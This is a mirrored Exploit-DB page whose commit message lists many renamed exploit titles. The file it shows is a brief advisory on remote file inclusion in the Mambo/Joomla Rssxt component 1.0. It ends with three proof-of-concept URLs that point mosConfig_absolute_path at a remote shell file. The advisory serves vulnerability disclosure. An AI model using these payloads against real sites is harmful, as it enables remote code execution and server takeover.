bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/28404.txt
Offensive Security 18f707fb94 DB: 2016-11-01 
24 new exploits

Serendipity 0.7-beta1 - SQL Injection (PoC)
S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)

Serendipity 0.8beta4 - exit.php SQL Injection
S9Y Serendipity 0.8beta4 - exit.php SQL Injection
CBSms Mambo Module 1.0 - Remote File Inclusion
Pearl For Mambo 1.6 - Multiple Remote File Inclusion
Mambo Module CBSms 1.0 - Remote File Inclusion
Mambo Component Pearl 1.6 - Multiple Remote File Inclusion

galleria Mambo Module 1.0b - Remote File Inclusion
Mambo Module galleria 1.0b - Remote File Inclusion
SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion
com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion
Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion
com_videodb Mambo Component 0.3en - Remote File Inclusion
SMF Forum Mambo Component 1.3.1.3 - Include
com_extcalendar Mambo Component 2.0 - Include
com_loudmouth Mambo Component 4.0j - Include
pc_cookbook Mambo Component 0.3 - Include
perForms Mambo Component 1.0 - Remote File Inclusion
com_hashcash Mambo Component 1.2.1 - Include
HTMLArea3 Mambo Module 1.5 - Remote File Inclusion
Sitemap Mambo Component 2.0.0 - Remote File Inclusion
pollxt Mambo Component 1.22.07 - Remote File Inclusion
MiniBB Mambo Component 1.5a - Remote File Inclusion
Mambo Component com_videodb 0.3en - Remote File Inclusion
Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion
Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion
Mambo Component com_loudmouth 4.0j -  Remote File Inclusion
Mambo Component pc_cookbook 0.3 - Remote File Inclusion
Mambo Component perForms 1.0 - Remote File Inclusion
Mambo Component com_hashcash 1.2.1 - Remote File Inclusion
Mambo Module HTMLArea3 1.5 - Remote File Inclusion
Mambo Component Sitemap 2.0.0 - Remote File Inclusion
Mambo Component pollxt 1.22.07 - Remote File Inclusion
Mambo Component MiniBB 1.5a - Remote File Inclusion

MoSpray Mambo Component 18RC1 - Remote File Inclusion
Mambo Component MoSpray 18RC1 - Remote File Inclusion

Mam-Moodle Mambo Component alpha - Remote File Inclusion
Mambo Component Mam-Moodle alpha - Remote File Inclusion

multibanners Mambo Component 1.0.1 - Remote File Inclusion
Mambo Component multibanners 1.0.1 - Remote File Inclusion

PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion
Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

a6mambohelpdesk Mambo Component 18RC1 - Include
Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion
Mambo Security Images Component 3.0.5 - Inclusion
Mambo MGM Component 0.95r2 - Remote File Inclusion
Mambo Colophon Component 1.2 - Remote File Inclusion
Mambo mambatStaff Component 3.1b - Remote File Inclusion
Mambo Component Security Images 3.0.5 - Inclusion
Mambo Component MGM 0.95r2 - Remote File Inclusion
Mambo Component 'com_colophon' 1.2 - Remote File Inclusion
Mambo Component mambatStaff 3.1b - Remote File Inclusion

Mambo User Home Pages Component 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion

Mambo Remository Component 3.25 - Remote File Inclusion
Mambo Component Remository 3.25 - Remote File Inclusion

Mambo mmp Component 1.2 - Remote File Inclusion
Mambo Component MMP 1.2 - Remote File Inclusion

Mambo Peoplebook Component 1.0 - Remote File Inclusion
Mambo Component Peoplebook 1.0 - Remote File Inclusion

Mambo CopperminePhotoGalery Component - Remote File Inclusion
Mambo Component CopperminePhotoGalery - Remote File Inclusion

Mambo mambelfish Component 1.1 - Remote File Inclusion
Mambo Component mambelfish 1.1 - Remote File Inclusion
Mambo phpShop Component 1.2 RC2b - File Inclusion
Mambo a6mambocredits Component 1.0.0 - File Inclusion
Mambo Component 'com_phpshop' 1.2 RC2b - File Inclusion
Mambo Component 'com_a6mambocredits' 1.0.0 - File Inclusion

Mambo MamboWiki Component 0.9.6 - Remote File Inclusion
Mambo Component MamboWiki 0.9.6 - Remote File Inclusion

Mambo cropimage Component 1.0 - Remote File Inclusion
Mambo Component cropimage 1.0 - Remote File Inclusion

Mambo com_lurm_constructor Component 0.6b - Include
Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion

mambo com_babackup Component 1.1 - File Inclusion
Mambo Component com_babackup 1.1 - File Inclusion

Mambo com_serverstat Component 0.4.4 - File Inclusion
Mambo Component com_serverstat 0.4.4 - File Inclusion

Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion

Mambo com_registration_detailed 4.1 - Remote File Inclusion
Mambo Component com_registration_detailed 4.1 - Remote File Inclusion

MambWeather Mambo Module 1.8.1 - Remote File Inclusion
Mambo Module MambWeather 1.8.1 - Remote File Inclusion

com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure
Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure

Serendipity 1.0.3 - 'comment.php' Local File Inclusion
S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion

Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)
Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)

mambo Component nfnaddressbook 0.4 - Remote File Inclusion
Mambo Component nfnaddressbook 0.4 - Remote File Inclusion

Joomla! / Mambo Component SWmenuFree 4.0 - Remote File Inclusion
Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion

Irfanview 3.99 - '.ani' Local Buffer Overflow (1)
IrfanView 3.99 - '.ani' Local Buffer Overflow (1)

Irfanview 3.99 - '.ani' Local Buffer Overflow (2)
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)

Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion
Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion

Joomla! / Mambo Component article 1.1 - Remote File Inclusion
Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion

Irfanview 4.00 - '.iff' Buffer Overflow
IrfanView 4.00 - '.iff' Buffer Overflow

Mambo com_yanc 1.4 Beta - 'id' SQL Injection
Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection

Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection
Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection

Irfanview 4.10 - '.fpx' Memory Corruption
IrfanView 4.10 - '.fpx' Memory Corruption
Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection
Mambo 'com_fq' - 'listid' Parameter SQL Injection
Mambo 'com_mamml' - 'listid' Parameter SQL Injection
Mambo Component Glossary 2.0 - 'catid' SQL Injection
Mambo Component 'com_newsletter'  4.5 - 'listid' Parameter SQL Injection
Mambo Component 'com_fq' - 'listid' Parameter SQL Injection
Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection
Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection
Mambo Component AkoGallery 2.5b - SQL Injection
Mambo Component Catalogshop 1.0b1 - SQL Injection
Mambo Component 'com_akogallery' 2.5b - SQL Injection
Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection

Mambo Component Awesom 0.3.2 - (listid) SQL Injection
Mambo Component 'com_awesom' 0.3.2 - (listid) SQL Injection

Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection
Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection

Mambo Component accombo 1.x - 'id' SQL Injection
Mambo Component 'com_accombo' 1.x - 'id' SQL Injection

Mambo Component ahsShop 1.51 - (vara) SQL Injection
Mambo Component 'com_ahsshop' 1.51 - 'vara' Parameter SQL Injection

Mambo Component Galleries 1.0 - (aid) SQL Injection
Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection

Mambo 4.6.4 - (Output.php) Remote File Inclusion
Mambo 4.6.4 - 'Output.php' Remote File Inclusion

Mambo Component Articles - (artid) Blind SQL Injection
Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection

Mambo Component n-gallery - Multiple SQL Injections
Mambo Component 'com_n-gallery' - Multiple SQL Injections

Irfanview 3.99 - IFF File Local Stack Buffer Overflow
IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow

Mambo Component n-form - (form_id) Blind SQL Injection
Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection

Mambo com_sim 0.8 - Blind SQL Injection
Mambo Component 'com_sim' 0.8 - Blind SQL Injection

Mambo Component com_hestar - SQL Injection
Mambo Component 'com_hestar' - SQL Injection

Mambo com_koesubmit 1.0.0 - Remote File Inclusion
Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion

Joomla! / Mambo Component Tupinambis - SQL Injection
Joomla! / Mambo Component 'com_tupinambis' - SQL Injection

Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion
Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion

Mambo Component Material Suche 1.0 - SQL Injection
Mambo Component 'com_materialsuche' 1.0 - SQL Injection

Mambo com_akogallery - SQL Injection
Mambo Component 'com_akogallery' - SQL Injection

Mambo Component com_acnews - [id] SQL Injection
Mambo Component 'com_acnews' - 'id' Parameter SQL Injection

Mambo Component com_mambads - SQL Injection
Mambo Component 'com_mambads' - SQL Injection

Rumba ftp Client 4.2 - PASV Buffer Overflow (SEH)
Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)

Serendipity 1.5.4 - Arbitrary File Upload
S9Y Serendipity 1.5.4 - Arbitrary File Upload

Irfanview 4.27 - 'JP2000.dll' plugin Denial of Service
IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service

Irfanview 4.28 - Multiple Denial of Service Vulnerabilities
IrfanView 4.28 - Multiple Denial of Service Vulnerabilities
Irfanview 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service
Irfanview 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service
IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service
IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service

PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)
PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)

Mambo CMS 4.6.x - (4.6.5) SQL Injection
Mambo 4.6.x < 4.6.5 - SQL Injection

Mambo CMS 4.x - (Zorder) SQL Injection
Mambo 4.x - 'Zorder' SQL Injection

Irfanview - '.tiff' Image Processing Buffer Overflow
IrfanView - '.tiff' Image Processing Buffer Overflow

Irfanview FlashPix PlugIn - Double-Free
IrfanView FlashPix PlugIn - Double-Free

Irfanview FlashPix PlugIn - Decompression Heap Overflow
IrfanView FlashPix PlugIn - Decompression Heap Overflow

Serendipity 1.6 - Backend Cross-Site Scripting / SQL Injection
S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection

Irfanview 4.33 - Format PlugIn ECW Decompression Heap Overflow
IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow

Irfanview 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow
IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow

Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow
IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow

Irfanview JLS Formats PlugIn - Heap Overflow
IrfanView JLS Formats PlugIn - Heap Overflow

Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)
IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)

Irfan Skiljan IrfanView32 3.0.7 - Image File Buffer Overflow
IrfanView32 3.0.7 - Image File Buffer Overflow

Joomla! Component Event Booking 2.10.1 - SQL Injection
Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection

Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection
Irfanview - '.RLE' Image Decompression Buffer Overflow
Irfanview - '.TIF' Image Decompression Buffer Overflow
IrfanView - '.RLE' Image Decompression Buffer Overflow
IrfanView - '.TIF' Image Decompression Buffer Overflow

Irfanview 4.33 - 'IMXCF.dll' Plugin Code Execution
IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution

Serendipity 0.x - exit.php HTTP Response Splitting
S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting

PCMan FTP Server 2.07 - PASS Command Buffer Overflow
PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow

PCMan FTP Server 2.07 - STOR Command Buffer Overflow
PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow

freeFTPd 1.0.10 - 'PASS' Buffer Overflow (SEH)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow

Joomla! Component VirtueMart 2.0.22a - SQL Injection
Joomla! Component 'com_virtuemart' 2.0.22a - SQL Injection

phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion
Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion

Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion
Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion

PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit)
PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit)

Irfanview 3.98 - '.ANI' Image File Denial of Service
IrfanView 3.98 - '.ANI' Image File Denial of Service

Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion
Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion
Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion
Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion
Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion
Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion

Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion
Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion

Mambo EstateAgent 1.0.2 Component - MosConfig_absolute_path Remote File Inclusion
Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion

Joomla! / Mambo Component Com_comprofiler 1.0 - class.php Remote File Inclusion
Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion

Hewlett-Packard 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery
Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery

Mambo MostlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion
Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion

Irfanview 3.99 - Multiple BMP Denial of Service Vulnerabilities
IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities

Joomla! / Mambo Component Mod_Forum - PHPBB_Root.php Remote File Inclusion
Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion

Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting
Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting

Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload
Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload

Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting
S9Y Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting
Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting
Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection
Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection
Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection

Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection
Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection
Joomla! / Mambo Component com_filebase - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection

Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection
Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection

Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection
PCMan FTP Server 2.07 - ABOR Command Buffer Overflow
PCMan FTP Server 2.07 - CWD Command Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow
PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow

Joomla! Component JomSocial 2.6 - Code Execution
Joomla! Component 'com_community' 2.6 - Code Execution

Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection
Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection

Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities
S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities

Joomla! / Mambo Component Joomlaearn Lms - 'cat' Parameter SQL Injection
Joomla! / Mambo Component 'com_lms' - 'cat' Parameter SQL Injection

Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection
Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection

Joomla! Component YouTube Gallery - SQL Injection
Joomla! Component 'com_youtubegallery' - SQL Injection

Joomla! Component Spider Form Maker 3.4 - SQL Injection
Joomla! Component 'com_formmaker' 3.4 - SQL Injection

Joomla! Component Spider Calendar 3.2.6 - SQL Injection
Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection

Joomla! Component Spider Contacts 1.3.6 - (index.php contacts_id Parameter)SQL Injection
Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection
Joomla! Component Face Gallery 1.0 - Multiple Vulnerabilities
Joomla! Component Mac Gallery 1.5 - Arbitrary File Download
Joomla! Component 'com_facegallery' 1.0 - Multiple Vulnerabilities
Joomla! Component 'com_macgallery' 1.5 - Arbitrary File Download

Joomla! Component HD FLV Player < 2.1.0.1 - SQL Injection
Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection

Joomla! Component HD FLV Player < 2.1.0.1 - Arbitrary File Download
Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download

Mambo - 'com_docman' 1.3.0 Component Multiple SQL Injection
Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection

Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting
S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting

Mambo CMS 4.6.x - Multiple Cross-Site Scripting Vulnerabilities
Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities

Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass

PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command
PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow

Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery
Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery

Serendipity 1.5.1 - 'research_display.php' SQL Injection
S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection

Mambo CMS N-Skyrslur - Cross-Site Scripting
Mambo Component 'com_n-skyrslur' - Cross-Site Scripting
Mambo CMS N-Gallery Component - SQL Injection
Mambo CMS AHS Shop Component - SQL Injection
Mambo Component 'com_n-gallery' - SQL Injection
Mambo Component 'com_ahsshop' - SQL Injection

Mambo CMS N-Press Component - SQL Injection
Mambo Component 'com_n-press' - SQL Injection
Mambo CMS N-Frettir Component - SQL Injection
Mambo CMS N-Myndir Component - SQL Injection
Mambo Component 'com_n-frettir' - SQL Injection
Mambo Component 'com_n-myndir' - SQL Injection

Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting
S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting

Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting
S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting

Joomla! Component Simple Photo Gallery 1.0 - Arbitrary File Upload
Joomla! Component 'com_simplephotogallery' 1.0 - Arbitrary File Upload

Joomla! Component Simple Photo Gallery 1.0 - SQL Injection
Joomla! Component 'com_simplephotogallery' 1.0 - SQL Injection

Joomla! Plugin eCommerce-WD 1.2.5 - SQL Injection
Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection

Joomla! Component Spider FAQ - SQL Injection
Joomla! Component 'com_spiderfaq' - SQL Injection
Joomla! Component Gallery WD - SQL Injection
Joomla! Component Contact Form Maker 1.0.1 - SQL Injection
Joomla! Component 'com_gallery_wd' - SQL Injection
Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection

Joomla! Component Spider Random Article - SQL Injection
Joomla! Component 'com_rand' - SQL Injection

Joomla! Component SimpleImageUpload - Arbitrary File Upload
Joomla! Component 'com_simpleimageupload' - Arbitrary File Upload

Joomla! Component DOCman - Multiple Vulnerabilities
Joomla! Component 'com_docman' - Multiple Vulnerabilities

Joomla! Plugin Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities
Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities

PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow

Joomla! Component Event Manager 2.1.4 - Multiple Vulnerabilities
Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities
Joomla! Component com_memorix - SQL Injection
Joomla! Component com_informations - SQL Injection
Joomla! Component 'com_memorix' - SQL Injection
Joomla! Component 'com_informations' - SQL Injection

PCMan FTP Server 2.0.7 - GET Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow

PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow

Joomla! Component Real Estate Manager 3.7 - SQL Injection
Joomla! Component 'com_realestatemanager' 3.7 - SQL Injection
Joomla! Extension Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Extension Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection
Joomla! Component 'com_jnews' 8.5.1 - SQL Injection

Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting
S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting

Joomla! Component JVideoClip - 'uid' Parameter SQL Injection
Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection

Joomla! Component Content History - SQL Injection / Remote Code Execution (Metasploit)
Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)

Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload
Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload

Joomla! Component Aclsfgpl - 'index.php' Arbitrary File Upload
Joomla! Component 'com_aclsfgpl' - 'index.php' Arbitrary File Upload

Joomla! Component Wire Immogest - 'index.php' SQL Injection
Joomla! Component 'com_wire_immogest' - 'index.php' SQL Injection

Joomla! Component Almond Classifieds - Arbitrary File Upload
Joomla! Component 'com_aclassfb' - Arbitrary File Upload

Joomla! Extension Sexy Polling - 'answer_id' Parameter SQL Injection
Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection

Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution
Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution

Joomla! Plugin Projoom NovaSFH - 'upload.php' Arbitrary File Upload
Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload

Joomla! Component Inneradmission - 'index.php' SQL Injection
Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection

Joomla! Extension Spider Video Player - 'theme' Parameter SQL Injection
Joomla! Component 'spidervideoplayer' - 'theme' Parameter SQL Injection

Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities
Joomla! Component 'com_poweradmin' 2.3.0 - Multiple Vulnerabilities

Joomla! Component Easy YouTube Gallery 1.0.2 - SQL Injection
Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection

PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)
PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit)

Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities
Joomla! Component 'SecurityCheck' 2.8.9 - Multiple Vulnerabilities

Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection
Joomla! Component 'com_payplans' 3.3.6 - SQL Injection

Joomla! Component En Masse (com_enmasse) 5.1 < 6.4 - SQL Injection
Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection

Joomla! Component BT Media (com_bt_media) - SQL Injection
Joomla! Component 'com_bt_media' - SQL Injection

Joomla! Component Publisher Pro (com_publisher) - SQL Injection
Joomla! Component 'com_publisher' - SQL Injection
Joomla! Component Guru Pro (com_guru) - SQL Injection
PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)
Joomla! Component 'com_guru' - SQL Injection
PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)
Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)
Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)
Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)
Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)

Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)
Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)

freeFTPd 1.0.8 - 'mkd' Command Denial Of Service

Micro Focus Rumba 9.4 - Local Denial Of Service
Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow
S9Y Serendipity 2.0.4 - Cross-Site Scripting
Rumba FTP Client 4.x - Stack buffer overflow (SEH)
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free
OS X/iOS Kernel - IOSurface Use-After-Free
OS X/iOS - mach_ports_register Multiple Memory Safety Issues
NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation
NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace
NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d
NVIDIA Driver - No Bounds Checking in Escape 0x7000194
NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x600000D
NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation
NVIDIA Driver - Escape 0x100010b Missing Bounds Check
NVIDIA Driver - No Bounds Checking in Escape 0x7000170
NVIDIA Driver - Unchecked User-Provided Pointer in Escape 0x5000027
NVIDIA Driver - Incorrect Bounds Check in Escape 0x70001b2
NVIDIA Driver - Missing Bounds Check in Escape 0x100009a
NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5
NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014
NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9
MacOS 10.12 - 'task_t' Privilege Escalation
PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow
2016-11-01 05:01:18 +00:00

13 lines
No EOL
928 B
Text
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/19593/info
The Mambo Rssxt component for Joomla and Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.0 and prior are vulnerable to these issues; other versions may also be affected.
This BID has been retired.
http://www.example.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt?
http://www.example.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt?
http://www.example.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt?
Reference in a new issue View git blame Copy permalink